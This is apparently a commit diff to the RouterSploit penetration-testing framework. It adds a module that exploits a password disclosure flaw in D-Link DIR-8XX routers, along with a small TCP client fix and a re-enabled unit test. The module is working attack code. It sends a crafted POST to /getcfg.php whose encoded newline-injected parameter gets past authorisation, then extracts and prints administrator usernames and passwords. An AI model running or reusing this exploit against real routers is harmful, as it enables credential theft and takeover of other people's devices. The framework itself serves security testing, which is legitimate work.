Adding D-Link DIR-8XX Password Disclosure module (#413)

routersploit/core/tcp/tcp_client.py

@@ -58,8 +58,12 @@ class TCPClient(Exploit):
                 received = 0
                 while received < num:
                     tmp = tcp_client.recv(num - received)
+
+                    if tmp:
                         received += len(tmp)
                         response += tmp
+                    else:
+                        break
 
                 return response
             except socket.timeout:

routersploit/modules/exploits/routers/dlink/dir_8xx_password_disclosure.py

+import re
+from routersploit.core.exploit import *
+from routersploit.core.http.http_client import HTTPClient
+
+
+class Exploit(HTTPClient):
+    __info__ = {
+        "name": "D-Link DIR-8XX Password Disclosure",
+        "description": "Module exploits D-Link DIR-8XX password disclosure vulnerability, "
+                       "which allows retrieving administrative credentials.",
+        "authors": (
+            "Hack2Win",  # vulnerability discovery
+            "Peter Geissler",  # vulnerablity discovery
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        ),
+        "references": (
+            "https://blogs.securiteam.com/index.php/archives/3310",
+            "https://blogs.securiteam.com/index.php/archives/3364",
+            "https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin",
+        ),
+        "devices": (
+            "D-Link DIR-8XX",
+        )
+    }
+
+    target = OptIP("", "Target IPv4 or IPv6 address")
+    port = OptPort(80, "Target HTTP port")
+
+    def run(self):
+        self.credentials = []
+
+        if self.check():
+            print_success("Target seems to be vulnerable")
+            print_table(("User ID", "Username", "Password"), *self.credentials)
+        else:
+            print_error("Exploit Failed - Target does not seem to be vulnerable")
+
+    @mute
+    def check(self):
+        headers = {
+            "Content-Type": "text/plain;charset=UTF-8",
+            "Content-Length": "0"
+        }
+
+        response = self.http_request(
+            method="POST",
+            path="/getcfg.php?A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1",
+            headers=headers
+        )
+
+        if response is None:
+            return False
+
+        usrids = re.findall("<usrid>(.*?)</usrid>", response.text)
+        usernames = re.findall("<name>(.*?)</name>", response.text)
+        passwords = re.findall("<password>(.*?)</password>", response.text)
+
+        if usrids or usernames or passwords:
+            self.credentials = [creds for creds in zip(usrids, usernames, passwords)]
+            return True
+
+        return False

tests/exploits/routers/dlink/test_dir_8xx_auth_bypass_password_disclosure.py → tests/exploits/routers/dlink/test_dir_8xx_password_disclosure.py

 from flask import request
-#from routersploit.modules.exploits.routers.dlink.dir_8xx_auth_bypass_password_disclosure import Exploit
+from routersploit.modules.exploits.routers.dlink.dir_8xx_password_disclosure import Exploit
 
 
 def apply_response():
@@ -51,8 +51,6 @@ def apply_response():
 
 
 def test_exploit_success(target):
-    return
-
     """ Test scenario - successful exploitation """ 
 
     cgi_mock = target.get_route_mock("/getcfg.php", methods=["GET", "POST"])
@@ -63,3 +61,4 @@ def test_exploit_success(target):
     exploit.port = target.port
 
     assert exploit.check()
+    assert exploit.run() is None